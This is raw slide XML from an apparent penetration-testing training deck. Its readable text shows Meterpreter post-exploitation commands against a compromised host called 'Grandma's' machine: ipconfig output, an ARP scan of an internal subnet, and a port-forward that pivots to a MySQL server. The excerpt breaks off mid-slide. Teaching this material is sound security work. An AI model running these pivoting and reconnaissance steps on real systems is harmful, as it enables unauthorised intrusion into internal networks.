              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>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endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>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endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>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endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>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endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>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endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>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endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>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173086927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7D9B14-FFD6-4D39-B7F3-F5D9A9995343}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="926432" y="196850"/>
            <a:ext cx="4754896" cy="1600200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Penetration Test Scenario</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D931C1B1-A1E3-43B7-9CFA-1BD56913EBEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="336883" y="2057399"/>
            <a:ext cx="11622505" cy="4235117"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t># obtain Grandma’s network info</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &gt; ipconfig</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Interface  7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>============</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Name         : Intel(R) 82574L Gigabit Network Connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Hardware MAC : 00:0c:29:e5:5e:c6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>MTU          : 1500</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>IPv4 Address : 192.168.30.18</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>IPv4 Netmask : 255.255.255.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>IPv6 Address : fe80::2cbc:8470:3547:a8a1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>IPv6 Netmask : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ffff:ffff:ffff:ffff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>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endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>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endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>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endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>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endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>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endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>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endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>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94619435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7D9B14-FFD6-4D39-B7F3-F5D9A9995343}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="926432" y="196850"/>
            <a:ext cx="4754896" cy="1600200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Penetration Test Scenario</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D931C1B1-A1E3-43B7-9CFA-1BD56913EBEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="336883" y="2057399"/>
            <a:ext cx="11622505" cy="4235117"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t># find database server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &gt; run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>arp_scanner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -r 192.168.30.0/24</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] ARP Scanning 192.168.30.0/24</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] IP: 192.168.30.1 MAC 00:0c:29:52:ac:24</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] IP: 192.168.30.15 MAC 00:0c:29:1b:22:c9</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] IP: 192.168.30.16 MAC 00:0c:29:a3:ee:cc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] IP: 192.168.30.18 MAC 00:0c:29:e5:5e:c6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>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endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>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endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>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endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>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endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>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endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>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endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>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366467873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7D9B14-FFD6-4D39-B7F3-F5D9A9995343}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="926432" y="196850"/>
            <a:ext cx="4754896" cy="1600200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Penetration Test Scenario</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D931C1B1-A1E3-43B7-9CFA-1BD56913EBEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="336883" y="2057399"/>
            <a:ext cx="11622505" cy="4235117"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>port forward local port 3306 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>) to grandma’s remote machine to 127.0.0.1:3306</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>portfwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> add -l 3306 -p 3306 -r 192.168.30.16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
